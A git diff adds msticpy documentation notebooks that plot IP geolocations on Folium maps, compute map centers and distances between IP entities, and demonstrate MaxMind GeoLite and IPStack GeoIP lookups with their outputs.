ICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl84NDZmMGUyM2ExNzU0ZjVmYTFlMjAzYjdiOGJhMDRlYiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM2LjY1MzQsIC03OC4zNzVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzhmYWViYzM0NjcwYzQ3ZTVhY2UwYjdhOTM3YWVjMjAyID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJkZXNrdG9wIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJkYXJrYmx1ZSIsICJwcmVmaXgiOiAiZmEifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfODQ2ZjBlMjNhMTc1NGY1ZmExZTIwM2I3YjhiYTA0ZWIuc2V0SWNvbihpY29uXzhmYWViYzM0NjcwYzQ3ZTVhY2UwYjdhOTM3YWVjMjAyKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF8xMThkNjg2NTIyN2Q0ZTU1OTUwZDIzNzRhNmNiZTQ3ZSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfM2QyY2IwNGMwZWI3NDQxY2I3YjczNmIzZjFhZDQ0MDYgPSAkKGA8ZGl2IGlkPSJodG1sXzNkMmNiMDRjMGViNzQ0MWNiN2I3MzZiM2YxYWQ0NDA2IiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9Qm95ZHRvbiwgTG9uZ2l0dWRlPS03OC4zNzUsIExhdGl0dWRlPTM2LjY1MzQsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IG5hPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzExOGQ2ODY1MjI3ZDRlNTU5NTBkMjM3NGE2Y2JlNDdlLnNldENvbnRlbnQoaHRtbF8zZDJjYjA0YzBlYjc0NDFjYjdiNzM2YjNmMWFkNDQwNik7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl84NDZmMGUyM2ExNzU0ZjVmYTFlMjAzYjdiOGJhMDRlYi5iaW5kUG9wdXAocG9wdXBfMTE4ZDY4NjUyMjdkNGU1NTk1MGQyMzc0YTZjYmU0N2UpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl84NDZmMGUyM2ExNzU0ZjVmYTFlMjAzYjdiOGJhMDRlYi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBCb3lkdG9uLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzhjZjBkYjdlM2FhMDQ3MWFhNDQwNDExYWMwYWMxNjQ3ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzguNzA5NSwgLTc4LjE1MzldLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzhhYmFhNmI0NzQ0YjRmNDY5YmVlMzM5ZjQ0NTdkMmNjID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJkZXNrdG9wIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJkYXJrYmx1ZSIsICJwcmVmaXgiOiAiZmEifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfOGNmMGRiN2UzYWEwNDcxYWE0NDA0MTFhYzBhYzE2NDcuc2V0SWNvbihpY29uXzhhYmFhNmI0NzQ0YjRmNDY5YmVlMzM5ZjQ0NTdkMmNjKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF8yMGRlMjgyMjU5NDU0OTlmODRiYzNiZDdjN2QxYjExOSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfMDAzNGMwOGRiNjIxNDU1NTgyYTI4NzAxNzExYzVjMTYgPSAkKGA8ZGl2IGlkPSJodG1sXzAwMzRjMDhkYjYyMTQ1NTU4MmEyODcwMTcxMWM1YzE2IiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiBuYTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF8yMGRlMjgyMjU5NDU0OTlmODRiYzNiZDdjN2QxYjExOS5zZXRDb250ZW50KGh0bWxfMDAzNGMwOGRiNjIxNDU1NTgyYTI4NzAxNzExYzVjMTYpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfOGNmMGRiN2UzYWEwNDcxYWE0NDA0MTFhYzBhYzE2NDcuYmluZFBvcHVwKHBvcHVwXzIwZGUyODIyNTk0NTQ5OWY4NGJjM2JkN2M3ZDFiMTE5KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfOGNmMGRiN2UzYWEwNDcxYWE0NDA0MTFhYzBhYzE2NDcuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgV2FzaGluZ3RvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCjwvc2NyaXB0Pg== onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x297d5fe2a88>"
+      ]
+     },
+     "execution_count": 18,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "fmap_ips.add_geoloc_cluster(geo_locations=geo_locs[40:50], color='darkblue', icon=\"desktop\", prefix=\"fa\")\n",
+    "fmap_ips.center_map()\n",
+    "fmap_ips"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Utility Functions"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Calculate center point of entity locations"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.815007Z",
+     "start_time": "2020-02-08T01:01:41.807012Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(38.7095, -78.375)\n",
+      "(39.70266078431372, -85.0484019607843)\n",
+      "(40.15505, -78.26445)\n",
+      "(39.9247, -79.4195)\n",
+      "(39.9247, -79.4195)\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.foliummap import get_map_center, get_center_ip_entities, get_center_geo_locs\n",
+    "\n",
+    "print(get_center_geo_locs(geo_locs))\n",
+    "print(get_center_geo_locs(geo_locs, mode=\"mean\"))\n",
+    "\n",
+    "# get_map_center Will accept iterable of any entity type that is either\n",
+    "# an IpAddress entity or an entity that has properties of type IpAddress\n",
+    "print(get_map_center(ip_ents[30:40]))\n",
+    "print(get_map_center(ip_ents[:20]))\n",
+    "\n",
+    "print(get_center_ip_entities(ip_ents[:20])) "
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Calculate distance between entity locations"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Distance between\n",
+      "{ 'AdditionalData': {},\n",
+      "  'Address': '65.55.44.109',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'City': 'Boydton',\n",
+      "                'CountryCode': 'US',\n",
+      "                'CountryName': 'United States',\n",
+      "                'Latitude': 36.6534,\n",
+      "                'Longitude': -78.375,\n",
+      "                'State': 'Virginia',\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()} { 'AdditionalData': {},\n",
+      "  'Address': '13.71.172.128',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'City': 'Toronto',\n",
+      "                'CountryCode': 'CA',\n",
+      "                'CountryName': 'Canada',\n",
+      "                'Latitude': 43.6644,\n",
+      "                'Longitude': -79.4195,\n",
+      "                'State': 'Ontario',\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()}\n",
+      "\n",
+      " 784.604908273247 km\n",
+      "Distance between\n",
+      "{ 'AdditionalData': {},\n",
+      "  'Address': '65.55.44.109',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'City': 'Boydton',\n",
+      "                'CountryCode': 'US',\n",
+      "                'CountryName': 'United States',\n",
+      "                'Latitude': 36.6534,\n",
+      "                'Longitude': -78.375,\n",
+      "                'State': 'Virginia',\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()} { 'AdditionalData': {},\n",
+      "  'Address': '40.77.226.250',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'City': 'Dublin',\n",
+      "                'CountryCode': 'IE',\n",
+      "                'CountryName': 'Ireland',\n",
+      "                'Latitude': 53.3338,\n",
+      "                'Longitude': -6.2488,\n",
+      "                'State': 'Leinster',\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()}\n",
+      "\n",
+      " 5699.044784950343 km\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.sectools.geoip import entity_distance\n",
+    "print(\"Distance between\")\n",
+    "print(ip_ents[0], ip_ents[1])\n",
+    "print(\"\\n\", entity_distance(ip_ents[0], ip_ents[1]), \"km\")\n",
+    "\n",
+    "print(\"Distance between\")\n",
+    "print(ip_ents[0], ip_ents[13])\n",
+    "print(\"\\n\", entity_distance(ip_ents[0], ip_ents[13]), \"km\")"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": true,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/GeoIPLookups.ipynb b/docs/notebooks/GeoIPLookups.ipynb
new file mode 100644
index 000000000..350f024ab
--- /dev/null
+++ b/docs/notebooks/GeoIPLookups.ipynb
@@ -0,0 +1,1422 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - GeoIP Lookup\n",
+    "\n",
+    "## Introduction\n",
+    "This module contains two classes that allow you to look up the Geolocation of IP Addresses.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "\n",
+    "### MaxMind GeoIPLite\n",
+    "This product includes GeoLite2 data created by MaxMind, available from\n",
+    "<a>https://www.maxmind.com</a>.\n",
+    "\n",
+    "This uses a local database which is downloaded first time when class object is instantiated. It gives very fast lookups but you need to download updates regularly. Maxmind offers a free tier of this database, updated monthly. For greater accuracy and more detailed information they have varying levels of paid service. Please check out their site for more details.\n",
+    "\n",
+    "The geoip module uses official maxmind pypi package - geoip2 and also has options to customize the behavior of local maxmind database.\n",
+    "* ```db_folder``` : Specify custom path containing local maxmind city database. If not specified, download to .msticpy dir under user\\`s home dir.\n",
+    "* ```force_update``` : can be set to True/False to issue force update despite of age check.\n",
+    "* Check age of maxmind city database based on database info and download new if it is not updated in last 30 days.\n",
+    "* ``auto_update``` : can be set to True/False Allow option to override auto update database if user is desired not to update database older than 30 days.\n",
+    "\n",
+    "### IPStack\n",
+    "This library uses services provided by ipstack.\n",
+    "<a>https://ipstack.com</a>\n",
+    "\n",
+    "IPStack is an online service and also offers a free tier of their service. Again, the paid tiers offer greater accuracy, more detailed information and higher throughput. Please check out their site for more details.\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>\n",
+    "## Table of Contents\n",
+    "- [Maxmind GeoIP Lookup](#geoip_lookups)\n",
+    "- [IPStack GeoIP Lookup](#ipstack_lookups)\n",
+    "- [Dataframe input](#dataframe_input)\n",
+    "- [Creating your own GeoIP Class](#custom_lookup)\n",
+    "- [Calculating Geographical Distances](#calc_distance)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:51.269375Z",
+     "start_time": "2020-02-08T02:38:49.282504Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "\n",
+    "from IPython.display import display\n",
+    "import pandas as pd\n",
+    "\n",
+    "import msticpy.sectools as sectools\n",
+    "from msticpy.nbtools import *\n",
+    "from msticpy.nbtools.entityschema import IpAddress, GeoLocation\n",
+    "from msticpy.sectools.geoip import GeoLiteLookup, IPStackLookup"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "## Maxmind GeoIP Lite Lookup Class\n",
+    "Signature:\n",
+    "```\n",
+    "iplocation.lookup_ip(ip_address: str = None, \n",
+    "                     ip_addr_list: collections.abc.Iterable = None,\n",
+    "                     ip_entity: msticpy.nbtools.entityschema.IpAddress = None)\n",
+    "Docstring:\n",
+    "Lookup IP location from GeoLite2 data created by MaxMind.\n",
+    "\n",
+    "Keyword Arguments:\n",
+    "    ip_address {str} -- a single address to look up (default: {None})\n",
+    "    ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})\n",
+    "    ip_entity {IpAddress} -- an IpAddress entity\n",
+    "\n",
+    "Returns:\n",
+    "    tuple(list{dict}, list{entity}) -- returns raw geolocation results and\n",
+    "        same results as IP/Geolocation entities\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:51.294362Z",
+     "start_time": "2020-02-08T02:38:51.270375Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Raw result\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[{'continent': {'code': 'EU',\n",
+       "   'geoname_id': 6255148,\n",
+       "   'names': {'de': 'Europa',\n",
+       "    'en': 'Europe',\n",
+       "    'es': 'Europa',\n",
+       "    'fr': 'Europe',\n",
+       "    'ja': 'ヨーロッパ',\n",
+       "    'pt-BR': 'Europa',\n",
+       "    'ru': 'Европа',\n",
+       "    'zh-CN': '欧洲'}},\n",
+       "  'country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'location': {'accuracy_radius': 1000,\n",
+       "   'latitude': 55.7386,\n",
+       "   'longitude': 37.6068,\n",
+       "   'time_zone': 'Europe/Moscow'},\n",
+       "  'registered_country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'traits': {'ip_address': '90.156.201.97', 'prefix_len': 17}}]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entity\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'Address':&nbsp;'90.156.201.97',<br>&nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'RU',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;55.7386,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;37.6068,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>&nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>&nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "IpAddress(Address=90.156.201.97, Location={ 'AdditionalData': {},\n",
+       "  'CountryCode': 'RU',\n",
+       " ...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "iplocation = GeoLiteLookup()\n",
+    "loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "\n",
+    "print('Raw result')\n",
+    "display(loc_result)\n",
+    "\n",
+    "print('IP Address Entity')\n",
+    "display(ip_entity[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:51.311353Z",
+     "start_time": "2020-02-08T02:38:51.296360Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Raw result\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[{'continent': {'code': 'EU',\n",
+       "   'geoname_id': 6255148,\n",
+       "   'names': {'de': 'Europa',\n",
+       "    'en': 'Europe',\n",
+       "    'es': 'Europa',\n",
+       "    'fr': 'Europe',\n",
+       "    'ja': 'ヨーロッパ',\n",
+       "    'pt-BR': 'Europa',\n",
+       "    'ru': 'Европа',\n",
+       "    'zh-CN': '欧洲'}},\n",
+       "  'country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'location': {'accuracy_radius': 1000,\n",
+       "   'latitude': 55.7386,\n",
+       "   'longitude': 37.6068,\n",
+       "   'time_zone': 'Europe/Moscow'},\n",
+       "  'registered_country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'traits': {'ip_address': '90.156.201.97', 'prefix_len': 17}}]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entity\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'Address':&nbsp;'90.156.201.97',<br>&nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'RU',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;55.7386,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;37.6068,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>&nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>&nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "IpAddress(Address=90.156.201.97, Location={ 'AdditionalData': {},\n",
+       "  'CountryCode': 'RU',\n",
+       " ...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "import tempfile\n",
+    "from pathlib import Path\n",
+    "tmp_folder = tempfile.gettempdir()\n",
+    "iplocation = GeoLiteLookup(db_folder=str(Path(tmp_folder).joinpath('geolite')))\n",
+    "loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "\n",
+    "print('Raw result')\n",
+    "display(loc_result)\n",
+    "\n",
+    "print('IP Address Entity')\n",
+    "display(ip_entity[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:54.589392Z",
+     "start_time": "2020-02-08T02:38:51.312351Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "force_update is set to True. Attempting to download new database to C:\\Users\\Ian\\.msticpy\\GeoLite2\n",
+      "Downloading and extracting GeoLite DB archive from MaxMind....\n",
+      "Raw result\n"
+     ]
+    },
+    {
+     "name": "stderr",
+     "output_type": "stream",
+     "text": [
+      "e:\\src\\microsoft\\msticpy\\msticpy\\sectools\\geoip.py:609: UserWarning: Error writing GeoIP DB file: C:\\Users\\Ian\\.msticpy\\GeoLite2\\GeoLite2-City.mmdb - [Errno 22] Invalid argument: 'C:\\\\Users\\\\Ian\\\\.msticpy\\\\GeoLite2\\\\GeoLite2-City.mmdb'\n",
+      "  warnings.warn(f\"Error writing GeoIP DB file: {db_file_path} - {err}\")\n",
+      "e:\\src\\microsoft\\msticpy\\msticpy\\sectools\\geoip.py:536: UserWarning: DB download failed\n",
+      "  warnings.warn(\"DB download failed\")\n",
+      "e:\\src\\microsoft\\msticpy\\msticpy\\sectools\\geoip.py:540: UserWarning: Continuing with cached database. Results may inaccurate.\n",
+      "  \"Continuing with cached database. Results may inaccurate.\"\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "[{'continent': {'code': 'EU',\n",
+       "   'geoname_id': 6255148,\n",
+       "   'names': {'de': 'Europa',\n",
+       "    'en': 'Europe',\n",
+       "    'es': 'Europa',\n",
+       "    'fr': 'Europe',\n",
+       "    'ja': 'ヨーロッパ',\n",
+       "    'pt-BR': 'Europa',\n",
+       "    'ru': 'Европа',\n",
+       "    'zh-CN': '欧洲'}},\n",
+       "  'country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'location': {'accuracy_radius': 1000,\n",
+       "   'latitude': 55.7386,\n",
+       "   'longitude': 37.6068,\n",
+       "   'time_zone': 'Europe/Moscow'},\n",
+       "  'registered_country': {'geoname_id': 2017370,\n",
+       "   'iso_code': 'RU',\n",
+       "   'names': {'de': 'Russland',\n",
+       "    'en': 'Russia',\n",
+       "    'es': 'Rusia',\n",
+       "    'fr': 'Russie',\n",
+       "    'ja': 'ロシア',\n",
+       "    'pt-BR': 'Rússia',\n",
+       "    'ru': 'Россия',\n",
+       "    'zh-CN': '俄罗斯联邦'}},\n",
+       "  'traits': {'ip_address': '90.156.201.97', 'prefix_len': 17}}]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IP Address Entity\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
